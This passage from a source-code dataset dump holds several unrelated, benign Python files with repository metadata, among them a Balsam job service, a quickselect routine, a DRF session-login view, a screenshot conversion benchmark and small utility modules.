internal: Manifest = adapter.load_internal_manifest()
def set_header(manifest: Manifest) -> None:
adapter.connections.set_query_header(manifest)
return load_manifest(config, internal, set_header)
| 38.208333 | 75 | 0.760087 | 131 | 917 | 5.229008 | 0.519084 | 0.040876 | 0.043796 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.17121 | 917 | 23 | 76 | 39.869565 | 0.901316 | 0.4253 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0.4 | 0 | 0.7 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
21fc6b78c90650153fe0a66ddcecb6e108d72054 | 367 | py | Python | apc/apc/apc_config.py | jmsung/APC | 9f0e065aa748a4d041b783b07cd8078715d39625 | [
"MIT"
] | null | null | null | apc/apc/apc_config.py | jmsung/APC | 9f0e065aa748a4d041b783b07cd8078715d39625 | [
"MIT"
] | null | null | null | apc/apc/apc_config.py | jmsung/APC | 9f0e065aa748a4d041b783b07cd8078715d39625 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Wed Mar 13 11:30:05 2019
@author: Jongmin Sung
"""
# config.py
import os
from pathlib import Path
from inspect import currentframe, getframeinfo
fname = getframeinfo(currentframe()).filename # current file name
current_dir = Path(fname).resolve().parent
data_dir = Path(fname).resolve().parent.parent.parent/'data'
| 16.681818 | 65 | 0.716621 | 50 | 367 | 5.22 | 0.68 | 0.05364 | 0.091954 | 0.145594 | 0.191571 | 0 | 0 | 0 | 0 | 0 | 0 | 0.041801 | 0.152589 | 367 | 21 | 66 | 17.47619 | 0.797428 | 0.297003 | 0 | 0 | 0 | 0 | 0.016461 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.5 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
21fe43d98daef7dd3ebf40de9036c681e2844778 | 8,798 | py | Python | balsam/management/commands/balsam_service.py | hep-cce/hpc-edge-service | 57f2b9252d21d478eabe06cbdced5b623f08c75f | [
"BSD-3-Clause"
] | null | null | null | balsam/management/commands/balsam_service.py | hep-cce/hpc-edge-service | 57f2b9252d21d478eabe06cbdced5b623f08c75f | [
"BSD-3-Clause"
] | null | null | null | balsam/management/commands/balsam_service.py | hep-cce/hpc-edge-service | 57f2b9252d21d478eabe06cbdced5b623f08c75f | [
"BSD-3-Clause"
] | null | null | null | import os,sys,logging,multiprocessing,Queue,traceback
logger = logging.getLogger(__name__)
from django.core.management.base import BaseCommand, CommandError
from django.conf import settings
from balsam import models,BalsamJobReceiver,QueueMessage
from common import DirCleaner,log_uncaught_exceptions,TransitionJob
from balsam import scheduler
from balsam.schedulers import exceptions,jobstates
# assign this function to the system exception hook
sys.excepthook = log_uncaught_exceptions.log_uncaught_exceptions
class Command(BaseCommand):
help = 'Start Balsam Service, which monitors the message queue for new jobs and submits them to the local batch system.'
logger.info('''
>>>>> Starting Balsam Service <<<<<
>>>>> pid: ''' + str(os.getpid()) + ''' <<<<<
''')
def handle(self, *args, **options):
try:
logger.debug('starting BalsamJobReceiver')
subprocesses = {}
# start the balsam job receiver in separate thread
try:
p = BalsamJobReceiver.BalsamJobReceiver()
p.start()
subprocesses['BalsamJobReceiver'] = p
except Exception,e:
logger.exception(' Received Exception while trying to start job receiver: ' + str(e))
raise
# setup timer for cleaning the work folder of old files
logger.debug('creating DirCleaner')
workDirCleaner = DirCleaner.DirCleaner(settings.BALSAM_WORK_DIRECTORY,
settings.BALSAM_DELETE_OLD_WORK_PERIOD,
settings.BALSAM_DELETE_OLD_WORK_AGE,
)
# create the balsam service queue which subprocesses use to commicate
# back to the the service. It is also used to wake up the while-loop
logger.debug('creating balsam_service_queue')
balsam_service_queue = multiprocessing.Queue()
jobs_in_transition_by_id = {}
# this is the loop that never ends, yes it goes on and on my friends...
while True:
logger.debug('begin service loop ')
# loop over queued jobs and check their status
# also look for jobs that have been submitted but are not in the queued or running state, which
# may mean they have finished or exited.
logger.debug( ' checking for active jobs ')
active_jobs = models.BalsamJob.objects.filter(state__in = models.CHECK_STATUS_STATES)
if len(active_jobs) > 0:
logger.info( 'monitoring ' + str(len(active_jobs)) + ' active jobs')
else:
logger.debug(' no active jobs')
for job in active_jobs:
# update job's status
try:
jobstate = scheduler.get_job_status(job)
if jobstate == jobstates.JOB_RUNNING and job.state != models.RUNNING.name:
job.state = models.RUNNING.name
elif jobstate == jobstates.JOB_QUEUED and job.state != models.QUEUED.name:
job.state = models.QUEUED.name
elif jobstate == jobstates.JOB_FINISHED and job.state != models.EXECUTION_FINISHED.name:
job.state = models.EXECUTION_FINISHED.name
#scheduler.postprocess(job) <<< check on this...
else:
logger.debug('job pk=' + str(job.pk) + ' remains in state ' + str(jobstate))
continue # jump to next job, skip remaining actions
job.save(update_fields=['state'])
models.send_status_message(job,'Job entered ' + job.state + ' state')
except exceptions.JobStatusFailed,e:
message = 'get_job_status failed for pk='+str(job.pk)+': ' + str(e)
logger.error(message)
# TODO: Should I fail the job?
models.send_status_message(job,message)
except Exception,e:
message = 'failed to get status for pk='+str(job.pk)+', exception: ' + str(e)
logger.error(message)
# TODO: Should I fail the job?
models.send_status_message(job,message)
# first loop over jobs in transition and remove entries that are complete
for pk in jobs_in_transition_by_id.keys():
proc = jobs_in_transition_by_id[pk]
if not proc.is_alive():
# did subprocess exit cleanly with exitcode == 0
if proc.exitcode != 0:
logger.error('transition subprocess for pk=' + str(pk)
+ ' returned exit code ' + str(proc.exitcode))
# probably want to do other things to recover from error?
del jobs_in_transition_by_id[pk]
# see if any jobs are ready to transition, but exclude jobs already in transition
transitionable_jobs = models.BalsamJob.objects.filter(state__in=models.TRANSITIONABLE_STATES).exclude(pk__in=jobs_in_transition_by_id.keys())
logger.debug( ' found ' + str(len(transitionable_jobs)) + ' in states that need to be transitioned ')
# loop over jobs and transition
for job in transitionable_jobs:
# place a limit on the number of concurrent threads to avoid overloading CPU
if len(jobs_in_transition_by_id) < settings.BALSAM_MAX_CONCURRENT_TRANSITIONS:
logger.debug(' creating job transition ')
proc = TransitionJob.TransitionJob(
job.pk,
balsam_service_queue,
models.BalsamJob,
models.STATES_BY_NAME[job.state].transition_function
)
logger.debug(' start ')
proc.start()
jobs_in_transition_by_id[job.pk] = proc
else:
logger.debug(' too many jobs currently transitioning '
+ str(len(jobs_in_transition_by_id)) + ' and max is '
+ str(settings.BALSAM_MAX_CONCURRENT_TRANSITIONS))
# clean work directory periodically
if settings.BALSAM_DELETE_OLD_WORK:
workDirCleaner.clean()
# loop over running process and check status
for name,proc in subprocesses.iteritems():
if not proc.is_alive():
logger.info(' subprocess ' + name + ' has stopped with returncode ' + str(proc.exitcode) )
# block on getting message from the queue where subprocesses will send messages
try:
logger.debug('getting message from queue, blocking for '
+ str(settings.BALSAM_SERVICE_PERIOD) + ' seconds')
qmsg = balsam_service_queue.get(block=True,timeout=settings.BALSAM_SERVICE_PERIOD)
# act on messages
logger.debug('Received queue message code: ' + QueueMessage.msg_codes[qmsg.code])
logger.debug('Received queue message: ' + qmsg.message)
if qmsg.code == QueueMessage.TransitionComplete:
logger.debug('Transition Succeeded')
elif qmsg.code == QueueMessage.TransitionDbConnectionFailed:
logger.error('Transition DB connection failed: ' + qmsg.message)
job = models.BalsamJob.objects.get(pk=qmsg.pk)
job.state = models.STATE_BY_NAME[job.state].failed_state
job.save(update_fields=['state'])
elif qmsg.code == QueueMessage.TransitionDbRetrieveFailed:
logger.error('Transition failed to retrieve job from DB: ' + qmsg.message)
job = models.BalsamJob.objects.get(pk=qmsg.pk)
job.state = models.STATE_BY_NAME[job.state].failed_state
job.save(update_fields=['state'])
elif qmsg.code == QueueMessage.TransitionFunctionException:
logger.error('Exception received while running transition function: ' + qmsg.message)
job = models.BalsamJob.objects.get(pk=qmsg.pk)
job.state = models.STATE_BY_NAME[job.state].failed_state
job.save(update_fields=['state'])
else:
logger.error('No recognized QueueMessage code')
except Queue.Empty,e:
logger.debug('no messages on queue')
logger.info(' Balsam Service Exiting ')
except KeyboardInterrupt,e:
logger.info('Balsam Service Exiting')
return
| 50.855491 | 153 | 0.587406 | 949 | 8,798 | 5.316122 | 0.270811 | 0.034886 | 0.028543 | 0.028543 | 0.28226 | 0.168682 | 0.136967 | 0.136967 | 0.108028 | 0.108028 | 0 | 0.000512 | 0.333712 | 8,798 | 172 | 154 | 51.151163 | 0.860116 | 0.140145 | 0 | 0.224 | 0 | 0.008 | 0.152142 | 0 | 0 | 0 | 0 | 0.005814 | 0 | 0 | null | null | 0 | 0.056 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
1d0099bd08d14b67316e62ac1133b0502a7f11ee | 369 | py | Python | jts/backend/review/migrations/0003_auto_20191011_1025.py | goupaz/babylon | 4e638d02705469061e563fec349676d8faa9f648 | [
"MIT"
] | 1 | 2019-08-08T09:03:17.000Z | 2019-08-08T09:03:17.000Z | backend/review/migrations/0003_auto_20191011_1025.py | goupaz/website | ce1bc8b6c52ee0815a7b98842ec3bde0c20e0add | [
"Apache-2.0"
] | 2 | 2020-10-09T19:16:09.000Z | 2020-10-10T20:40:41.000Z | jts/backend/review/migrations/0003_auto_20191011_1025.py | goupaz/babylon-hackathon | 4e638d02705469061e563fec349676d8faa9f648 | [
"MIT"
] | 1 | 2019-07-21T01:42:21.000Z | 2019-07-21T01:42:21.000Z | # Generated by Django 2.2 on 2019-10-11 17:25
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('review', '0002_auto_20191009_1119'),
]
operations = [
migrations.RenameField(
model_name='review',
old_name='is_deleted',
new_name='is_rejected',
),
]
| 19.421053 | 46 | 0.593496 | 40 | 369 | 5.275 | 0.775 | 0.056872 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.11583 | 0.298103 | 369 | 18 | 47 | 20.5 | 0.698842 | 0.116531 | 0 | 0 | 1 | 0 | 0.17284 | 0.070988 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.083333 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
1d058aadd2ea53eaf7bc8c3792809f3c95cbd8ca | 2,056 | py | Python | algorithms_in_python/_12_sorting_and_selection/examples/quick_select.py | junteudjio/algorithms_in_python | 90ceced09828aedf845605e5236f48ea92a4419e | [
"MIT"
] | null | null | null | algorithms_in_python/_12_sorting_and_selection/examples/quick_select.py | junteudjio/algorithms_in_python | 90ceced09828aedf845605e5236f48ea92a4419e | [
"MIT"
] | null | null | null | algorithms_in_python/_12_sorting_and_selection/examples/quick_select.py | junteudjio/algorithms_in_python | 90ceced09828aedf845605e5236f48ea92a4419e | [
"MIT"
] | 1 | 2018-10-15T06:28:45.000Z | 2018-10-15T06:28:45.000Z | from random import shuffle
__author__ = 'Junior Teudjio'
def quick_select(l, k, find_largest=True):
"""
return the k_th largest/smallest element of list l
Parameters
----------
l : list
k : int
find_largest : Boolean
True if return the k_th largest element False if return the k-th smallest element
Returns
-------
element of list l
"""
def _partition(l, pivot, left, right):
i,j = left + 1, right-1
while i <= j:
while i <= j:
if l[i] <= pivot:
i += 1
else:
break
while i <= j:
if pivot < l[j]:
j -= 1
else:
break
# if the two pointers have not cross we need to swap positions and update pointers
if i <= j:
l[j], l[i] = l[i], l[j]
i += 1
j -= 1
return j
def _quick_select(l, k, left, right):
pivot = l[left]
pivot_new_position = _partition(l, pivot, left, right)
if pivot_new_position == k-1:
return pivot_new_position
elif k-1 < pivot_new_position:
return _quick_select(l, k, left, pivot_new_position)
else:
return _quick_select(l, k, pivot_new_position+1, right)
if len(l) == 0 or k == 0 or len(l) < k:
return None
# shuffle the list to make sure the partition steps doesn't take 0(n) time if the list is 'almost' sorted
shuffle(l)
k_smallest_idx = _quick_select(l, k, left=0, right=len(l))
if find_largest:
return len(l)-1 - k_smallest_idx
else:
return k_smallest_idx
def find_median(l):
return quick_select(l, len(l)//2)
if __name__ == '__main__':
l = range(100)
print quick_select(l, 1, find_largest=False)
print quick_select(l, 5, find_largest=True)
print quick_select(l, 54, find_largest=False)
print quick_select(l, 1, find_largest=True)
print find_median(l) | 28.164384 | 109 | 0.548638 | 293 | 2,056 | 3.65529 | 0.266212 | 0.102708 | 0.112045 | 0.060691 | 0.273576 | 0.089636 | 0.089636 | 0 | 0 | 0 | 0 | 0.017332 | 0.354572 | 2,056 | 73 | 110 | 28.164384 | 0.789751 | 0.089494 | 0 | 0.276596 | 0 | 0 | 0.013871 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.021277 | null | null | 0.106383 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
1d0a47a3797d1d7c500c16f2bd41153122397e81 | 1,187 | py | Python | rest_framework_sav/views.py | JamesRitchie/django-rest-framework-session-endpoint | a968129be88a1981d9904c3679e5fdd9490e890d | [
"BSD-2-Clause"
] | 21 | 2015-03-04T09:25:47.000Z | 2019-11-08T14:19:24.000Z | rest_framework_sav/views.py | JamesRitchie/django-rest-framework-session-endpoint | a968129be88a1981d9904c3679e5fdd9490e890d | [
"BSD-2-Clause"
] | 1 | 2015-03-04T09:26:17.000Z | 2015-03-11T13:10:20.000Z | rest_framework_sav/views.py | JamesRitchie/django-rest-framework-session-endpoint | a968129be88a1981d9904c3679e5fdd9490e890d | [
"BSD-2-Clause"
] | 1 | 2020-05-17T04:16:27.000Z | 2020-05-17T04:16:27.000Z | """Views for Django Rest Framework Session Endpoint extension."""
from django.contrib.auth import login, logout
from rest_framework import parsers, renderers
from rest_framework.authtoken.serializers import AuthTokenSerializer
from rest_framework.response import Response
from rest_framework.views import APIView
class SessionAuthView(APIView):
"""Provides methods for REST-like session authentication."""
throttle_classes = ()
permission_classes = ()
parser_classes = (
parsers.FormParser,
parsers.MultiPartParser,
parsers.JSONParser
)
renderer_classes = (renderers.JSONRenderer,)
def post(self, request):
"""Login using posted username and password."""
serializer = AuthTokenSerializer(data=request.data)
serializer.is_valid(raise_exception=True)
user = serializer.validated_data['user']
login(request, user)
return Response({'detail': 'Session login successful.'})
def delete(self, request):
"""Logout the current session."""
logout(request)
return Response({'detail': 'Session logout successful.'})
session_auth_view = SessionAuthView.as_view()
| 30.435897 | 68 | 0.711879 | 123 | 1,187 | 6.756098 | 0.504065 | 0.078219 | 0.081829 | 0.064982 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.194608 | 1,187 | 38 | 69 | 31.236842 | 0.869247 | 0.155013 | 0 | 0 | 0 | 0 | 0.068228 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.083333 | false | 0 | 0.208333 | 0 | 0.583333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
df0469beb5c62575548fc779498cc9b3a9cc1490 | 1,547 | py | Python | tests/bench_bgra2rgb.py | RedFantom/python-mss | 7e26de184b1e6a0800231b01451f794087a76f73 | [
"MIT"
] | null | null | null | tests/bench_bgra2rgb.py | RedFantom/python-mss | 7e26de184b1e6a0800231b01451f794087a76f73 | [
"MIT"
] | null | null | null | tests/bench_bgra2rgb.py | RedFantom/python-mss | 7e26de184b1e6a0800231b01451f794087a76f73 | [
"MIT"
] | null | null | null | # coding: utf-8
"""
2018-03-19.
Maximum screenshots in 1 second by computing BGRA raw values to RGB.
GNU/Linux
pil_frombytes 139
mss_rgb 119
pil_frombytes_rgb 51
numpy_flip 31
numpy_slice 29
macOS
pil_frombytes 209
mss_rgb 174
pil_frombytes_rgb 113
numpy_flip 39
numpy_slice 36
Windows
pil_frombytes 81
mss_rgb 66
pil_frombytes_rgb 42
numpy_flip 25
numpy_slice 22
"""
from __future__ import print_function
import time
import numpy
from PIL import Image
import mss
def mss_rgb(im):
return im.rgb
def numpy_flip(im):
frame = numpy.array(im, dtype=numpy.uint8)
return numpy.flip(frame[:, :, :3], 2).tobytes()
def numpy_slice(im):
return numpy.array(im, dtype=numpy.uint8)[..., [2, 1, 0]].tobytes()
def pil_frombytes_rgb(im):
return Image.frombytes('RGB', im.size, im.rgb).tobytes()
def pil_frombytes(im):
return Image.frombytes('RGB', im.size, im.bgra, 'raw', 'BGRX').tobytes()
def benchmark():
with mss.mss() as sct:
im = sct.grab(sct.monitors[0])
for func in (pil_frombytes,
mss_rgb,
pil_frombytes_rgb,
numpy_flip,
numpy_slice):
count = 0
start = time.time()
while (time.time() - start) <= 1:
func(im)
im._ScreenShot__rgb = None
count += 1
print(func.__name__.ljust(17), count)
benchmark()
| 19.582278 | 76 | 0.580478 | 206 | 1,547 | 4.15534 | 0.383495 | 0.140187 | 0.087617 | 0.03972 | 0.140187 | 0.140187 | 0.077103 | 0.077103 | 0 | 0 | 0 | 0.055344 | 0.32256 | 1,547 | 78 | 77 | 19.833333 | 0.76145 | 0.306399 | 0 | 0 | 0 | 0 | 0.012207 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1875 | false | 0 | 0.15625 | 0.125 | 0.5 | 0.0625 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 |
df0b8deb7b8139e6384b8790377b34bff7533519 | 2,725 | py | Python | ACME/render/renderer.py | mauriziokovacic/ACME | 2615b66dd4addfd5c03d9d91a24c7da414294308 | [
"MIT"
] | 3 | 2019-10-23T23:10:55.000Z | 2021-09-01T07:30:14.000Z | ACME/render/renderer.py | mauriziokovacic/ACME-Python | 2615b66dd4addfd5c03d9d91a24c7da414294308 | [
"MIT"
] | null | null | null | ACME/render/renderer.py | mauriziokovacic/ACME-Python | 2615b66dd4addfd5c03d9d91a24c7da414294308 | [
"MIT"
] | 1 | 2020-07-11T11:35:43.000Z | 2020-07-11T11:35:43.000Z | import neural_renderer as nr
from ..math.unitvec import *
class Renderer(nr.Renderer):
"""
A class extending the Neural Renderer
Attributes
----------
device : str or torch.device (optional)
the tensor the renderer will be stored to (default is 'cuda:0')
culling : str (optional)
the current active face culling (default is None)
Methods
-------
toggle_lighting(status)
toggles the renderer directional lighting on or off depending on status
enable_lighting()
enables the renderer lighting
disable_lighting()
disables the renderer lighting
disable_culling()
disables face culling
enable_back_culling()
enables back face culling
enable_front_culling()
enables front face culling
"""
def __init__(self, device='cuda:0', culling=None, lighting=False, **kwargs):
"""
Parameters
----------
device : str or torch.device (optional)
the device the tensors will be stored to (default is 'cuda:0')
culling : str (optional)
the current active face culling, either 'front' or 'back'.
If None no culling is performed (default is None)
lighting : bool (optional)
if True activates the lighting, False otherwise
**kwargs : ...
the Neural Renderer keyworded arguments
"""
super(Renderer, self).__init__(camera_mode='look_at', **kwargs)
self.eye = unitvec(3, 0, device=device)
self.light_direction = -self.eye
self.device = device
self.culling = culling
self.toggle_lighting(lighting)
def toggle_lighting(self, status):
"""
Toggles the renderer directional lighting on or off depending on status
Parameters
----------
status : bool
the lighting status
"""
if status:
self.light_intensity_directional = 0.5
else:
self.light_intensity_directional = 0
self.light_intensity_ambient = 1-self.light_intensity_directional
def enable_lighting(self):
"""Enables the renderer lighting"""
self.toggle_lighting(True)
def disable_lighting(self):
"""Disables the renderer lighting"""
self.toggle_lighting(False)
def disable_culling(self):
"""Disables face culling"""
self.culling = None
def enable_back_culling(self):
"""
Enables back face culling
"""
self.culling = 'back'
def enable_front_culling(self):
"""
Enables front face culling
"""
self.culling = 'front'
| 27.806122 | 80 | 0.601468 | 296 | 2,725 | 5.405405 | 0.263514 | 0.055 | 0.0475 | 0.054375 | 0.3 | 0.2625 | 0.21625 | 0.175 | 0.175 | 0.175 | 0 | 0.004787 | 0.310092 | 2,725 | 97 | 81 | 28.092784 | 0.846277 | 0.47633 | 0 | 0 | 0 | 0 | 0.019784 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.269231 | false | 0 | 0.076923 | 0 | 0.384615 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
df0c4609dc3d7030697a254872dda6cfb67438db | 641 | py | Python | setup.py | Wirtos/aioregex | b426fb99769d54d627e189bd058c4b724559fb80 | [
"MIT"
] | null | null | null | setup.py | Wirtos/aioregex | b426fb99769d54d627e189bd058c4b724559fb80 | [
"MIT"
] | null | null | null | setup.py | Wirtos/aioregex | b426fb99769d54d627e189bd058c4b724559fb80 | [
"MIT"
] | null | null | null | import setuptools
setuptools.setup(
name="aioregex",
version="0.1",
author="Wirtos_new",
author_email="Wirtos.new@gmail.com",
description="regex to allow both sync and async callables in the sub as repl",
url="https://wirtos.github.io/aioregex/",
packages=setuptools.find_packages(),
project_urls={
"Source Code": "https://github.com/Wirtos/aioregex",
},
install_requires=[],
keywords="regex re asyncio aioregex",
classifiers=[
"Programming Language :: Python :: >=3.5",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
)
| 29.136364 | 82 | 0.639626 | 73 | 641 | 5.547945 | 0.780822 | 0.044444 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007952 | 0.215289 | 641 | 21 | 83 | 30.52381 | 0.797217 | 0 | 0 | 0 | 0 | 0 | 0.49766 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.05 | 0 | 0.05 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
df144e0efba2d31bbcba42a1f4cb228efa1dd83b | 406 | py | Python | electrum/networks/auxpow_mixin.py | ZenyattaAbosom/AbosomElectrum | 02748b0b14e37385d6e77591d122e592740222bf | [
"MIT"
] | 4 | 2020-06-27T22:43:34.000Z | 2021-04-12T02:29:30.000Z | electrum/networks/auxpow_mixin.py | ZenyattaAbosom/AbosomElectrum | 02748b0b14e37385d6e77591d122e592740222bf | [
"MIT"
] | 21 | 2020-06-20T15:02:50.000Z | 2021-04-07T10:14:59.000Z | electrum/networks/auxpow_mixin.py | ZenyattaAbosom/AbosomElectrum | 02748b0b14e37385d6e77591d122e592740222bf | [
"MIT"
] | 13 | 2020-06-28T08:13:28.000Z | 2021-12-28T00:11:56.000Z | class AuxPowMixin(object):
AUXPOW_START_HEIGHT = 0
AUXPOW_CHAIN_ID = 0x0001
BLOCK_VERSION_AUXPOW_BIT = 0
@classmethod
def is_auxpow_active(cls, header) -> bool:
height_allows_auxpow = header['block_height'] >= cls.AUXPOW_START_HEIGHT
version_allows_auxpow = header['version'] & cls.BLOCK_VERSION_AUXPOW_BIT
return height_allows_auxpow and version_allows_auxpow | 40.6 | 80 | 0.743842 | 52 | 406 | 5.365385 | 0.442308 | 0.172043 | 0.121864 | 0.150538 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.021212 | 0.187192 | 406 | 10 | 81 | 40.6 | 0.824242 | 0 | 0 | 0 | 0 | 0 | 0.046683 | 0 | 0 | 0 | 0.014742 | 0 | 0 | 1 | 0.111111 | false | 0 | 0 | 0 | 0.666667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
df1524fa7728c1adb3ef0c319a786a66845f1e94 | 159 | py | Python | Problems/dicecup.py | rikgj/Kattis | 2e34dee307aef5acea5837732bf9f27f8c548e9c | [
"MIT"
] | null | null | null | Problems/dicecup.py | rikgj/Kattis | 2e34dee307aef5acea5837732bf9f27f8c548e9c | [
"MIT"
] | null | null | null | Problems/dicecup.py | rikgj/Kattis | 2e34dee307aef5acea5837732bf9f27f8c548e9c | [
"MIT"
] | null | null | null | from sys import stdin
a,b = [int(x) for x in stdin.readline().split(' ')]
diff = abs(a-b) +1
a = min(a,b) +1
print(a)
for x in range(1,diff):
print(a+x)
| 15.9 | 51 | 0.591195 | 35 | 159 | 2.685714 | 0.514286 | 0.06383 | 0.12766 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.023622 | 0.201258 | 159 | 9 | 52 | 17.666667 | 0.716535 | 0 | 0 | 0 | 0 | 0 | 0.006289 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.142857 | 0 | 0.142857 | 0.285714 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
df1fe7022c513f9daa84d71c86c0ba7d7afec1ce | 1,396 | py | Python | fdrtd/builtins/util/kvstorage.py | chart21/fdrtd | c5f8ba84f8e367580572f2759683dfd3789b0b80 | [
"MIT"
] | null | null | null | fdrtd/builtins/util/kvstorage.py | chart21/fdrtd | c5f8ba84f8e367580572f2759683dfd3789b0b80 | [
"MIT"
] | 10 | 2021-08-29T00:03:36.000Z | 2022-02-18T09:19:38.000Z | fdrtd/builtins/util/kvstorage.py | chart21/fdrtd | c5f8ba84f8e367580572f2759683dfd3789b0b80 | [
"MIT"
] | 2 | 2021-08-28T21:44:10.000Z | 2021-12-16T23:23:58.000Z | """
contains microservice KeyValueStorage
"""
import uuid as _uuid
from fdrtd.server.microservice import Microservice
class KeyValueStorage(Microservice):
"""stores and retrieves values by key"""
def __init__(self, bus, endpoint):
super().__init__(bus, endpoint)
self.storages = {'default': {}}
def create(self, value, storage='default'):
"""create a storage; store value, return key"""
if storage not in self.storages:
self.storages[storage] = {}
uuid = str(_uuid.uuid4())
callback = {'uuid': uuid, 'storage': storage}
self.store(value, callback)
return self.callback(callback)
def store(self, value, callback):
"""store value, return key"""
kvstorage = self.storages[callback['storage']]
kvstorage[callback['uuid']] = value
def retrieve(self, callback):
"""retrieve value from storage"""
kvstorage = self.storages[callback['storage']]
value = kvstorage[callback['uuid']]
return value
def exists(self, callback):
"""return true if key exists in storage"""
kvstorage = self.storages[callback['storage']]
return callback['uuid'] in kvstorage
def delete(self, callback):
"""delete key from storage"""
kvstorage = self.storages[callback['storage']]
del kvstorage[callback['uuid']]
| 30.347826 | 55 | 0.626791 | 148 | 1,396 | 5.844595 | 0.283784 | 0.09711 | 0.09711 | 0.134104 | 0.2 | 0.158382 | 0.108671 | 0 | 0 | 0 | 0 | 0.000946 | 0.242837 | 1,396 | 45 | 56 | 31.022222 | 0.817408 | 0.162607 | 0 | 0.153846 | 0 | 0 | 0.061008 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.230769 | false | 0 | 0.076923 | 0 | 0.461538 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
df2437ca766dc3a07e7da531239e5dd32c32401c | 1,773 | py | Python | gracc-oneoffs/remove-odd-procs/remove-odd-procs.py | opensciencegrid/gracc-tools | 86297d0a8b6b208b6c661473647fdc69f438afec | [
"Apache-2.0"
